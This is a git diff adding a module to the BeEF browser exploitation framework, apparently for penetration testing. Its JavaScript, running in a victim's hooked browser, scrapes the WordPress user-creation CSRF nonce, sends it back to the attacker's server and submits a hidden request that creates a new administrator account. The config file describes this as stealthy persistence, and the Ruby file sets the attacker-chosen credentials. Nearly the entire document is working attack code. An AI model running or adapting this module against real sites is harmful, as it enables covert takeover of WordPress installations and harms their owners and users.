diff --git a/modules/exploits/wordpress_add_admin/command.js b/modules/exploits/wordpress_add_admin/command.js
new file mode 100644
index 000000000..60a21f5ef
--- /dev/null
+++ b/modules/exploits/wordpress_add_admin/command.js
@@ -0,0 +1,74 @@
+//
+// Copyright (c) 2015 Daniel Reece - @HBRN8
+//
+
+beef.execute(function() {
+
+function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
+function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
+/* Kept incase there is a valid reason to use forms over AJAX, I cant think of any.
+function post(path, params, method) {
+    method = method || "post";
+    var form = document.createElement("form");
+    form.setAttribute("method", method);
+    form.setAttribute("action", path);
+
+    for(var key in params) {
+        if(params.hasOwnProperty(key)) {
+            var hiddenField = document.createElement("input");
+            hiddenField.setAttribute("type", "hidden");
+            hiddenField.setAttribute("name", key);
+            hiddenField.setAttribute("value", params[key]);
+            form.appendChild(hiddenField);
+         }
+    }
+    document.body.appendChild(form);
+    form.submit();
+}
+*/
+
+var domail = '<%= @domail %>';
+
+page = g("/wp-admin/user-new.php");
+
+m = page.match(/\-user" value="(.*?)" \/><input/);	
+	
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] + 
+"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");
+
+var blob = "action=createuser" +
+"&_wpnonce_create-user=" + m[1] +
+"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
+"&user_login=<%== format_multiline(@user) %>" +
+"&email=<%== format_multiline(@email) %>" +
+"&first_name=<%== format_multiline(@fname) %>" +
+"&last_name=<%== format_multiline(@lname) %>" +
+"&url=<%== format_multiline(@url) %>" +
+"&pass1=<%== format_multiline(@pass) %>" +
+"&pass2=<%== format_multiline(@pass) %>";
+if (domail){
+//Wordpress will mail regardless of param value if it exists.
+blob = blob + "&send_password=1";
+}
+blob = blob + "&role=administrator&createuser=Add+New+User";
+
+p("/wp-admin/user-new.php", blob);
+
+/* Still cant think of any.
+post('/wp-admin/user-new.php', 
+{action: 'createuser', 
+ '_wpnonce_create-user': m[1],
+ _wp_http_referer: '%2Fwp-admin%2Fuser-new.php', 
+ user_login: '<%== format_multiline(@user) %>',
+ email: '<%== format_multiline(@email) %>', 
+ first_name: '<%== format_multiline(@fname) %>', 
+ last_name: '<%== format_multiline(@lname) %>',
+ url: '<%== format_multiline(@url) %>',
+ pass1: '<%== format_multiline(@pass) %>', 
+ pass2: '<%== format_multiline(@pass) %>', 
+ send_password: '1', 
+ role: 'administrator', 
+ createuser: 'Add+New+User+'});
+*/
+	
+});
\ No newline at end of file
diff --git a/modules/exploits/wordpress_add_admin/config.yaml b/modules/exploits/wordpress_add_admin/config.yaml
new file mode 100644
index 000000000..d9999117e
--- /dev/null
+++ b/modules/exploits/wordpress_add_admin/config.yaml
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2015 Daniel Reece - @HBRN8
+#
+
+beef:
+    module:
+        Wordpress_add_admin:
+            enable: true
+            category: "Persistence"
+            name: "Wordpress Add Administrator"
+            description: "This module stealthily adds a Wordpress administrator account"
+            authors: ["hiburn8 @hbrn8"]
+            target:
+                 working: ["ALL"]
\ No newline at end of file
diff --git a/modules/exploits/wordpress_add_admin/module.rb b/modules/exploits/wordpress_add_admin/module.rb
new file mode 100644
index 000000000..cf418b508
--- /dev/null
+++ b/modules/exploits/wordpress_add_admin/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2015 Daniel Reece - @HBRN8
+
+class Wordpress_add_admin < BeEF::Core::Command
+
+        def self.options
+	    	return [{'name'=>'user', 'ui_label' => 'Username:', 'value' => 'beef'},	
+		{'name'=>'pass', 'ui_label' => 'Pwd:', 'value' => [*('a'..'z'),*('0'..'9')].shuffle[0,8].join},
+		{'name'=>'email', 'ui_label' => 'Email:', 'value' => ''},
+		{'name'=>'domail', 'type' => 'checkbox', 'ui_label' => 'Success mail?:', 'checked' => 'true'},
+		{'name'=>'url', 'ui_label' => 'Website:', 'value' => 'beefproject.com'},
+		{'name'=>'fname', 'ui_label' => 'FirstName:', 'value' => 'beef'},
+		{'name'=>'lname', 'ui_label' => 'LastName:', 'value' => 'project'}]
+	end
+
+  	def post_execute
+  	end
+  
+end